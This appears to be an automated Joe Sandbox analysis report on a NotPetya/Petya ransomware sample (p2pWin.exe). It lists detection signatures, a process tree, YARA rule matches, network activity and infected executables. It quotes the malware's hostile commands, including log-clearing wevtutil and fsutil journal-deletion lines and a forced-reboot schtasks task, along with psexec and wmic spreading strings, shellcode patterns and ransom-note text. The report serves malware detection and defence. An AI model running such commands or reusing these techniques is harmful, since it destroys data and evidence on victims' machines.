Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
p2pWin.exe

Overview

General Information

Sample Name:p2pWin.exe
Analysis ID:1346554
MD5:8c64181ff0dc12c87e443aae94bf6650
SHA1:e91d7ebd17912785caa3e71ef1571dc01b1cd854
SHA256:4c0153b979e65346c1d6f863086082ec5ef103cbf6b0f5e8652d61da678a8ca5
Tags:exekeygroup777MBRlock
Infos:

Detection

Petya / NotPetya, Mimikatz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Sigma detected: Execute DLL with spoofed extension
Yara detected NotPetya
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Detected Petya / NotPetya (based on Eternalblue SMBv1 Shellcode pattern)
Yara detected Mimikatz
Infects executable files (exe, dll, sys, html)
Writes directly to the primary disk partition (DR0)
Clears the journal log
Contains functionality to access PhysicalDrive, possible boot sector overwrite
Machine Learning detection for sample
Clears the windows event log
Performs an instant shutdown (NtRaiseHardError)
Found PSEXEC tool (often used for remote process execution)
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality to check for running processes (XOR)
Contains functionality to create processes via WMI
Contains functionality to enumerate network shares of other devices
Contains functionality to infect the boot sector
Contains functionality to spread via wmic.exe
Contains functionality to dump credential hashes (LSA Dump)
Infects the VBR (Volume Boot Record) of the hard disk
Found decision node followed by non-executed suspicious APIs
Contains functionality to create an SMB header
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected potential crypto function
Contains functionality to launch a process as a different user
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Yara detected PsExec sysinternal tool
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Enables debug privileges
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Enables security privileges
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapater information
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • p2pWin.exe (PID: 5320 cmdline: C:\Users\user\Desktop\p2pWin.exe MD5: 8C64181FF0DC12C87E443AAE94BF6650)
    • rundll32.exe (PID: 2284 cmdline: "C:\Windows\System32\rundll32.exe" C:\Windows\dllcm.dat #1 MD5: 889B99C52A60DD49227C5E485A016679)
      • cmd.exe (PID: 1460 cmdline: /c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 20:15 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 5824 cmdline: schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 20:15 MD5: 48C2FE20575769DE916F48EF0676A965)
      • F2CD.tmp (PID: 4464 cmdline: "C:\Users\user\AppData\Local\Temp\F2CD.tmp" \\.\pipe\{0F3B598D-CFC9-40D0-87DB-B9CBE1DF730C} MD5: 7E37AB34ECDCC3E77E24522DDFD4852D)
        • conhost.exe (PID: 1004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6244 cmdline: /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C: MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wevtutil.exe (PID: 3744 cmdline: wevtutil cl Setup MD5: 3C0E48DA02447863279B0FE3CE7FE5E8)
        • wevtutil.exe (PID: 7148 cmdline: wevtutil cl System MD5: 3C0E48DA02447863279B0FE3CE7FE5E8)
        • wevtutil.exe (PID: 1260 cmdline: wevtutil cl Security MD5: 3C0E48DA02447863279B0FE3CE7FE5E8)
        • wevtutil.exe (PID: 5800 cmdline: wevtutil cl Application MD5: 3C0E48DA02447863279B0FE3CE7FE5E8)
        • fsutil.exe (PID: 1900 cmdline: fsutil usn deletejournal /D C: MD5: 452CA7574A1B2550CD9FF83DDBE87463)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MimiKatzVaronis summarizes Mimikatz as an open-source application that allows users to view and save authentication credentials like Kerberos tickets. Benjamin Delpy continues to lead Mimikatz developments, so the toolset works with the current release of Windows and includes the most up-to-date attacks.Attackers commonly use Mimikatz to steal credentials and escalate privileges: in most cases, endpoint protection software and anti-virus systems will detect and delete it. Conversely, pentesters use Mimikatz to detect and exploit vulnerabilities in your networks so you can fix them.
  • APT32
  • Anunak
  • GALLIUM
https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
p2pWin.exeJoeSecurity_NotPetyaYara detected NotPetyaJoe Security
    p2pWin.exeBadRabbit_GenDetects BadRabbit RansomwareFlorian Roth
    • 0x19474:$s3: \\.\pipe\%ws
    • 0x19694:$s4: fsutil usn deletejournal /D %c:
    • 0x19948:$s9: process call create "C:\Windows\System32\rundll32.exe
    p2pWin.exeNotPetya_Ransomware_Jun17Detects new NotPetya Ransomware variant from June 2017Florian Roth
    • 0x15548:$x1: Ooops, your important files are encrypted.
    • 0x1f527:$x1: Ooops, your important files are encrypted.
    • 0x19948:$x2: process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1
    • 0x19860:$x3: -d C:\Windows\System32\rundll32.exe "C:\Windows\%s",#1
    • 0x1546e:$x4: Send your Bitcoin wallet ID and personal installation key to e-mail
    • 0x19694:$x5: fsutil usn deletejournal /D %c:
    • 0x1cef0:$x7: 2C 00 23 00 31 00 20 00 00 00 00 00 00 00 00 00 72 00 75 00 6E 00 64 00 6C 00 6C 00 33 00 32 00 2E 00 65 00 78 00 65 00
    • 0x198f0:$s1: %s /node:"%ws" /user:"%ws" /password:"%ws"
    • 0x19474:$s4: \\.\pipe\%ws
    • 0x196d8:$s5: schtasks %ws/Create /SC once /TN "" /TR "%ws" /ST %02d:%02d
    • 0x1982a:$s6: u%s \\%s -accepteula -s
    • 0x197bc:$s7: dllhost.dat
    p2pWin.exefe_cpe_ms17_010_ransomwareprobable petya ransomware using eternalblue, wmic, psexecian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
    • 0x15368:$dmap01: \\.\PhysicalDrive
    • 0x197fc:$dmap01: \\.\PhysicalDrive
    • 0x197fc:$dmap02: \\.\PhysicalDrive0
    • 0x197f4:$dmap03: \\.\C:
    • 0x194ec:$dmap04: TERMSRV
    • 0x199ec:$dmap05: \admin$
    • 0x19a06:$dmap05: \admin$
    • 0x19f06:$dmap06: GetLogicalDrives
    • 0x19ee0:$dmap07: GetDriveTypeW
    • 0x1f433:$msg01: WARNING: DO NOT TURN OFF YOUR PC!
    • 0x1f455:$msg02: IF YOU ABORT THIS PROCESS
    • 0x1f47d:$msg03: DESTROY ALL OF YOUR DATA!
    • 0x1f497:$msg04: PLEASE ENSURE THAT YOUR POWER CABLE IS PLUGGED
    • 0x15556:$msg05: your important files are encrypted
    • 0x1f52e:$msg05: your important files are encrypted
    • 0x153e2:$msg06: Your personal installation key
    • 0x1f7c8:$msg06: Your personal installation key
    • 0x15926:$msg07: worth of Bitcoin to following address
    • 0x1f722:$msg07: worth of Bitcoin to following address
    • 0x1f4d4:$msg08: CHKDSK is repairing sector
    • 0x1f342:$msg09: Repairing file system on
    p2pWin.exedoublepulsarxor_petyarule to hit on the xored doublepulsar shellcodepatrick jones
    • 0x177e0:$doublepulsarxor_petya: FD 0C 8C 5C B8 C4 24 C5 CC CC CC 0E E8 CC 24 6B CC CC CC 0F 24 CD CC CC CC 27 5C 97 75 BA CD CC CC C3 FE
    Click to see the 2 entries

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Windows\dllhost.datJoeSecurity_PsExecYara detected PsExec sysinternal toolJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpJoeSecurity_NotPetyaYara detected NotPetyaJoe Security
        00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpfe_cpe_ms17_010_ransomwareprobable petya ransomware using eternalblue, wmic, psexecian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
        • 0x2f38:$dmap01: \\.\PhysicalDrive
        • 0x73cc:$dmap01: \\.\PhysicalDrive
        • 0x73cc:$dmap02: \\.\PhysicalDrive0
        • 0x73c4:$dmap03: \\.\C:
        • 0x70bc:$dmap04: TERMSRV
        • 0x75bc:$dmap05: \admin$
        • 0x75d6:$dmap05: \admin$
        • 0x7ad6:$dmap06: GetLogicalDrives
        • 0x7ab0:$dmap07: GetDriveTypeW
        • 0x3126:$msg05: your important files are encrypted
        • 0x2fb2:$msg06: Your personal installation key
        • 0x34f6:$msg07: worth of Bitcoin to following address
        • 0x3052:$msg10: Bitcoin wallet ID
        • 0x30c8:$msg12: 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX
        • 0x2d88:$functions01: need dictionary
        • 0x718c:$functions02: ComSpec
        • 0x80f6:$functions03: OpenProcessToken
        • 0x7a6e:$functions04: CloseHandle
        • 0x7bcc:$functions05: EnterCriticalSection
        • 0x7d66:$functions06: ExitProcess
        • 0x7c5a:$functions07: GetCurrentProcess
        00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpdoublepulsarxor_petyarule to hit on the xored doublepulsar shellcodepatrick jones
        • 0x53b0:$doublepulsarxor_petya: FD 0C 8C 5C B8 C4 24 C5 CC CC CC 0E E8 CC 24 6B CC CC CC 0F 24 CD CC CC CC 27 5C 97 75 BA CD CC CC C3 FE
        00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpdoublepulsardllinjection_petyarule to hit on the xored doublepulsar dll injection shellcodepatrick jones
        • 0x5d27:$doublepulsardllinjection_petya: 45 20 8D 93 8D 92 8D 91 8D 90 92 93 91 97 0F 9F 9E 9D 99 84 45 29 84 4D 20 CC CD CC CC 9B 84 45 03 84 45 14 84 45 49 CC 33 33 33 24 77 CC CC CC 84 45 49 C4 33 33 33 24 84 CD CC CC 84 45 49 DC ...
        00000000.00000000.1627434367.0000000000036000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_NotPetyaYara detected NotPetyaJoe Security
          Click to see the 19 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.p2pWin.exe.4d890.3.raw.unpackNotPetya_Ransomware_Jun17Detects new NotPetya Ransomware variant from June 2017Florian Roth
          • 0x3297:$x1: Ooops, your important files are encrypted.
          • 0xc60:$x7: 2C 00 23 00 31 00 20 00 00 00 00 00 00 00 00 00 72 00 75 00 6E 00 64 00 6C 00 6C 00 33 00 32 00 2E 00 65 00 78 00 65 00
          0.1.p2pWin.exe.4c050.2.raw.unpackNotPetya_Ransomware_Jun17Detects new NotPetya Ransomware variant from June 2017Florian Roth
          • 0x4ad7:$x1: Ooops, your important files are encrypted.
          • 0x24a0:$x7: 2C 00 23 00 31 00 20 00 00 00 00 00 00 00 00 00 72 00 75 00 6E 00 64 00 6C 00 6C 00 33 00 32 00 2E 00 65 00 78 00 65 00
          0.1.p2pWin.exe.4d890.1.raw.unpackNotPetya_Ransomware_Jun17Detects new NotPetya Ransomware variant from June 2017Florian Roth
          • 0x3297:$x1: Ooops, your important files are encrypted.
          • 0xc60:$x7: 2C 00 23 00 31 00 20 00 00 00 00 00 00 00 00 00 72 00 75 00 6E 00 64 00 6C 00 6C 00 33 00 32 00 2E 00 65 00 78 00 65 00
          1.2.rundll32.exe.2ce5020.2.unpackJoeSecurity_NotPetyaYara detected NotPetyaJoe Security
            1.2.rundll32.exe.2ce5020.2.unpackBadRabbit_GenDetects BadRabbit RansomwareFlorian Roth
            • 0x12444:$s3: \\.\pipe\%ws
            • 0x12664:$s4: fsutil usn deletejournal /D %c:
            • 0x12918:$s9: process call create "C:\Windows\System32\rundll32.exe
            Click to see the 81 entries

            Sigma Signatures

            Data Obfuscation

            barindex
            Sigma detected: Execute DLL with spoofed extension
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\rundll32.exe" C:\Windows\dllcm.dat #1, CommandLine: "C:\Windows\System32\rundll32.exe" C:\Windows\dllcm.dat #1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Users\user\Desktop\p2pWin.exe, ParentImage: C:\Users\user\Desktop\p2pWin.exe, ParentProcessId: 5320, ParentProcessName: p2pWin.exe, ProcessCommandLine: "C:\Windows\System32\rundll32.exe" C:\Windows\dllcm.dat #1, ProcessId: 2284, ProcessName: rundll32.exe

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: p2pWin.exeReversingLabs: Detection: 59%
            Antivirus / Scanner detection for submitted sample
            Source: p2pWin.exeAvira: detected
            Machine Learning detection for sample
            Source: p2pWin.exeJoe Sandbox ML: detected
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E5189A StrStrIW,CreateFileW,GetFileSizeEx,CreateFileMappingW,MapViewOfFile,CryptEncrypt,FlushViewOfFile,UnmapViewOfFile,FindCloseChangeNotification,FindCloseChangeNotification,1_2_02E5189A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E51E51 CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptDestroyKey,CryptReleaseContext,LocalFree,1_2_02E51E51
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E51B4E CryptGenKey,CryptSetKeyParam,CryptSetKeyParam,CryptSetKeyParam,1_2_02E51B4E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E51C7F CryptExportKey,CryptExportKey,LocalAlloc,CryptExportKey,CryptBinaryToStringW,CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,LocalFree,1_2_02E51C7F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E51424 CryptAcquireContextA,GetLastError,GetLastError,CryptGenRandom,GetLastError,CryptReleaseContext,1_2_02E51424
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E51BA0 CryptStringToBinaryW,CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalAlloc,CryptDecodeObjectEx,CryptImportKey,LocalFree,LocalFree,1_2_02E51BA0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: mov dword ptr [esi+04h], 424D53FFh1_2_02E52466
            Source: p2pWin.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: p2pWin.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: c:\src\Pstools\psexec\SVC\Release\psexesvc.pdb x source: dllhost.dat.1.dr
            Source: Binary string: c:\src\Pstools\psexec\SVC\Release\psexesvc.pdb source: dllhost.dat.1.dr
            Source: Binary string: lsasrv.pdb source: F2CD.tmp, 00000004.00000003.1635517667.000000000282C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: lsasrv.pdbUGP source: F2CD.tmp, 00000004.00000003.1635517667.000000000282C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: c:\src\Pstools\psexec\EXE\Release\psexec.pdb source: dllhost.dat.1.dr
            Source: Binary string: C:\Zeus \PC\documents\visual studio 2010\Projects\Keygroup\Release\Keygroup.pdb source: p2pWin.exe

            Spreading

            barindex
            Infects executable files (exe, dll, sys, html)
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\7-Zip\7zFM.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\7-Zip\7z.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\7-Zip\7zG.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Common Files\microsoft shared\ClickToRun\InspectorOfficeGadget.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem file mapped for write: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Found PSEXEC tool (often used for remote process execution)
            Source: dllhost.dat.1.drString found in binary or memory: PsExec executes a program on a remote system, where remotely executed console
            Contains functionality to enumerate network shares of other devices
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E59987 wsprintfW,wsprintfW,wsprintfW,WNetAddConnection2W,wsprintfW,PathFindExtensionW,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError, \\%s\admin$1_2_02E59987
            Contains functionality to spread via wmic.exe
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E598AB GetSystemDirectoryW,PathAppendW,PathFileExistsW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,GetLastError,1_2_02E598AB
            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E51973 PathCombineW,FindFirstFileW,StrStrIW,WaitForSingleObject,PathCombineW,StrStrIW,PathFindExtensionW,wsprintfW,StrStrIW,FindNextFileW,FindClose,1_2_02E51973

            Networking

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.0 139Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.1 80Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 173.222.162.32 445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.4:49675 -> 173.222.162.32:443
            Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
            Source: Yara matchFile source: C:\Windows\dllhost.dat, type: DROPPED
            Source: global trafficTCP traffic: 192.168.2.4:49742 -> 173.222.162.32:139
            Source: rundll32.exe, 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/
            Source: rundll32.exe, 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/#=
            Source: rundll32.exe, 00000001.00000002.1670751144.0000000004D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1:80/
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E567AF memset,select,recv,htons,recv,1_2_02E567AF
            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32

            Spam, unwanted Advertisements and Ransom Demands

            barindex
            Yara detected NotPetya
            Source: Yara matchFile source: p2pWin.exe, type: SAMPLE
            Source: Yara matchFile source: 1.2.rundll32.exe.2ce5020.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.1.p2pWin.exe.37830.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.1.p2pWin.exe.37830.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.rundll32.exe.2e50000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.p2pWin.exe.37830.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.0.p2pWin.exe.37830.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.0.p2pWin.exe.30000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.p2pWin.exe.30000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.rundll32.exe.2ce5020.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.0.p2pWin.exe.37830.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.p2pWin.exe.37830.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000000.1627434367.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000001.1627535297.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: p2pWin.exe PID: 5320, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTR
            Detected Petya / NotPetya (based on Eternalblue SMBv1 Shellcode pattern)
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E53CA01_2_02E53CA0
            Clears the journal log
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
